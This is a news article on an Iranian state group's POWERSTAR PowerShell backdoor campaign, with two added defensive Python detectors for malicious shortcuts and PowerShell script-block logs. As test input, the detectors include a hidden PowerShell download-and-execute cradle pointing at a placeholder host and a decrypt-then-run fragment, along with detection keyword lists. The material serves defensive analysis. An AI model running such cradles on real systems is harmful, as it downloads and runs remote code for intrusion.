Charming Kitten, a nation-state actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), has been linked to a bespoke spear-phishing campaign that delivers an updated version of a fully featured PowerShell backdoor called POWERSTAR.
“There have been enhanced operational security measures placed in the malware to make it more difficult to analyze and gather intelligence,” Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week.
The group is adept at social engineering, often creating customized fake personas on social media platforms and engaging in ongoing conversations to build rapport before sending malicious links. Charming Kitten is also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.
Recent intrusions orchestrated by Charming Kitten have used other implants such as PowerLess and BellaCiao, suggesting that the group draws on a suite of espionage tools to realize its strategic goals.
POWERSTAR is another addition to the group’s arsenal. Also called CharmPower, the backdoor was first publicly documented by Check Point in January 2022, when it was observed in an attack that weaponized the Log4Shell vulnerability (CVE-2021-44228) in publicly exposed Java applications.
It has since been used in at least two other campaigns, as documented by PwC in July 2022 and Microsoft in April 2023.
Volexity, which detected an early variant of POWERSTAR in 2021 distributed via malicious macros embedded in DOCM files, says that the May 2023 attack wave instead used LNK files inside password-protected RAR archives to download the backdoor from Backblaze, while taking steps to hinder analysis.
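The LNK-in-archive delivery described above is worth a concrete check. The following is an added example for this article, not Volexity's or the actor's code: a minimal parser for the Windows Shell Link format (MS-SHLLINK) that pulls out the shortcut's target and command-line arguments and flags shortcuts that launch a script host with download-cradle or hide-window switches. The shortcuts it analyzes are constructed in the block itself (the URL uses an RFC 2606 reserved name); the `build_lnk` helper, the marker list and the `assess` heuristic are this example's own assumptions, not part of any published detection rule.

```python
"""Parse a Windows Shell Link (.lnk) and flag script-host download cradles.

Added example for this article, not Volexity's or the actor's code. The layout
follows MS-SHLLINK: a 76-byte ShellLinkHeader, optional LinkTargetIDList and
LinkInfo structures, then StringData fields whose presence LinkFlags announces.
All shortcuts below are constructed test input.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1, 2, 4, 8
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 16, 32, 64, 128

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Heuristic vocabulary (assumption of this example, tune for your environment).
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "downloaddata", "invoke-webrequest",
                  "iwr ", "iex ", "iex(", "invoke-expression", "frombase64string",
                  "-enc", "-w hidden", "-windowstyle hidden", "bypass")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk; IDList and LinkInfo are skipped, not decoded."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) followed by the IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    info = {"flags": flags}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        info[field] = data[pos:pos + count * width].decode(codec)
        pos += count * width
    return info


def assess(info: dict) -> dict:
    """Verdict: a script host launched with download, decode or hide-window switches."""
    launch = " ".join(info.get(k, "") for k in ("relative_path", "arguments")).lower()
    host = next((h for h in SCRIPT_HOSTS if h in launch), None)
    markers = [m for m in CRADLE_MARKERS if m in launch]
    return {"host": host, "markers": markers,
            "suspicious": host is not None and len(markers) > 0}


def build_lnk(relative_path: str, arguments: str = "", idlist: bytes = b"") -> bytes:
    """Build a minimal Unicode .lnk for testing (constructed input, not a real sample)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_LINK_TARGET_ID_LIST if idlist else 0
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20)  # size, CLSID, flags, FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24                                        # Creation/Access/Write FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 7, 0, 0, 0, 0)        # FileSize, IconIndex, ShowCommand=SW_SHOWMINNOACTIVE, HotKey, Reserved1-3
    body = struct.pack("<H", len(idlist)) + idlist if idlist else b""
    for s in (relative_path, arguments):                          # StringData in spec order
        if s:
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed samples: a PowerShell download cradle and a benign shortcut.
STAGER_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/stage\')"',
    idlist=b"\x00\x00")   # an IDList holding only the TerminalID
BENIGN_LNK = build_lnk(r"..\Program Files\Notepad++\notepad++.exe")

if __name__ == "__main__":
    for name, blob in (("stager", STAGER_LNK), ("benign", BENIGN_LNK)):
        print(name, assess(parse_lnk(blob)))
```

Real shortcuts almost always carry a LinkTargetIDList and LinkInfo, and the icon usually points at a document viewer so the file passes as a PDF or Word file; the parser skips those structures by size rather than decoding them, which is enough to reach the arguments field where the cradle lives. Run it over every `.lnk` extracted from a mail attachment archive before anything is double-clicked.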
“With POWERSTAR, Charming Kitten seeks to limit the risk of exposing their malware to analysis and detection by sending the decryption method separately from the initial code and never writing it to disk,” the researchers said.
“This has the added bonus of acting as an operational guardrail, as separating the decryption method from the command-and-control (C2) server prevents future successful decryption of the corresponding POWERSTAR payload.”
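A payload whose decryption routine arrives separately and is never written to disk still has to pass through the PowerShell engine to run, and that is where script block logging (Event ID 4104) captures it. The block below is an added example for this article, not Volexity's tooling: it reassembles 4104 fragments (long script blocks are logged in parts sharing a ScriptBlockId) and then flags blocks that combine a decryption API with an invocation primitive. It assumes script block logging is enabled and that events have already been exported to Python dicts carrying the EventData fields ScriptBlockId, MessageNumber, MessageTotal and ScriptBlockText; the events and the regex vocabulary are this example's own constructions.

```python
"""Reassemble PowerShell 4104 script-block fragments and flag decrypt-then-run chains.

Added example for this article, not Volexity's tooling. Assumes Event ID 4104
records exported to dicts with ScriptBlockId, MessageNumber, MessageTotal and
ScriptBlockText. Long blocks are logged in fragments sharing a ScriptBlockId,
so the crypto setup can sit in part 1 and the Invoke-Expression in part 3:
match on the reassembled text, not on single fragments. All samples are constructed.
"""
import re
from collections import defaultdict

# Regex vocabulary is an assumption of this example; extend it for your estate.
FETCH = re.compile(r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|"
                   r"Invoke-RestMethod|\bIWR\b|\bIRM\b", re.I)
DECRYPT = re.compile(r"AesManaged|AesCryptoServiceProvider|RijndaelManaged|TripleDES|"
                     r"CreateDecryptor|\[Convert\]::FromBase64String", re.I)
INVOKE = re.compile(r"\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create|"
                    r"\[Reflection\.Assembly\]::Load|Add-Type", re.I)


def classify(text: str) -> tuple:
    """Return (verdict, tags) for the full text of one script block."""
    tags = [n for n, rx in (("fetch", FETCH), ("decrypt", DECRYPT), ("invoke", INVOKE))
            if rx.search(text)]
    if "decrypt" in tags and "invoke" in tags:
        verdict = "in-memory decrypt-and-run"
    elif "fetch" in tags and "invoke" in tags:
        verdict = "download cradle"
    elif tags:
        verdict = "weak"
    else:
        verdict = "benign"
    return verdict, tags


def analyze(events: list) -> dict:
    """Group 4104 fragments by ScriptBlockId, join them in order, classify each block."""
    frags, totals = defaultdict(dict), {}
    for e in events:
        sbid = e["ScriptBlockId"]
        frags[sbid][int(e["MessageNumber"])] = e["ScriptBlockText"]   # XML exports carry strings
        totals[sbid] = int(e["MessageTotal"])
    results = {}
    for sbid, parts in frags.items():
        complete = len(parts) == totals[sbid]        # missing fragments: still score, but say so
        text = "".join(parts[i] for i in sorted(parts))
        verdict, tags = classify(text)
        results[sbid] = {"verdict": verdict, "tags": tags,
                         "complete": complete, "length": len(text)}
    return results


# Constructed sample events (real ScriptBlockIds are GUIDs). sb-a arrives out of
# order in three parts; sb-b is a benign one-liner; sb-c is missing its second part.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "sb-a", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$k = [Convert]::FromBase64String($env:STAGE_KEY); "
                        "$aes = New-Object System.Security.Cryptography.AesManaged; "},
    {"ScriptBlockId": "sb-a", "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "IEX ([Text.Encoding]::UTF8.GetString($plain))"},
    {"ScriptBlockId": "sb-a", "MessageNumber": 2, "MessageTotal": 3,
     "ScriptBlockText": "$aes.Key = $k; $d = $aes.CreateDecryptor(); "
                        "$plain = $d.TransformFinalBlock($blob, 0, $blob.Length); "},
    {"ScriptBlockId": "sb-b", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse -Include *.docx | Select-Object FullName"},
    {"ScriptBlockId": "sb-c", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$wc = New-Object Net.WebClient; "
                        "$blob = $wc.DownloadData('https://example.invalid/s'); "},
]

if __name__ == "__main__":
    for sbid, r in analyze(SAMPLE_EVENTS).items():
        print(sbid, r)
```

Two caveats a practitioner should keep in mind: an operator who can tamper with the logging policy or with ETW can suppress 4104 events, so treat a sudden absence of script block logs from a host as its own signal; and a block that was split across fragments scores "weak" on each fragment in isolation, which is exactly the miss the reassembly step avoids.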
The backdoor comes with an extensive feature set that allows it to remotely execute PowerShell and C# commands, set up persistence, collect system information, and download and run additional modules to enumerate running processes, capture screenshots, search for files matching specific extensions, and check whether the persistence component is still intact.
Also improved and extended from previous versions is a cleanup module designed to remove all traces of the malware, including its persistence-related registry keys. The update demonstrates Charming Kitten’s continued efforts to refine its tradecraft and evade detection.
Volexity said it also detected a different POWERSTAR variant that attempts to retrieve its hard-coded C2 servers by decoding a file stored on the decentralized InterPlanetary File System (IPFS), signaling an attempt to make its attack infrastructure more resilient to takedown.
The development coincides with MuddyWater (aka Static Kitten) using a previously undocumented command-and-control (C2) framework called PhonyC2 to deliver malicious payloads to compromised hosts.
“The general phishing playbook used by Charming Kitten and POWERSTAR’s overall goals remain consistent,” the researchers said. “References to persistence mechanisms and executable payloads in the POWERSTAR Cleanup module strongly suggest a broader set of tools used by Charming Kitten to conduct malware-enabled espionage.”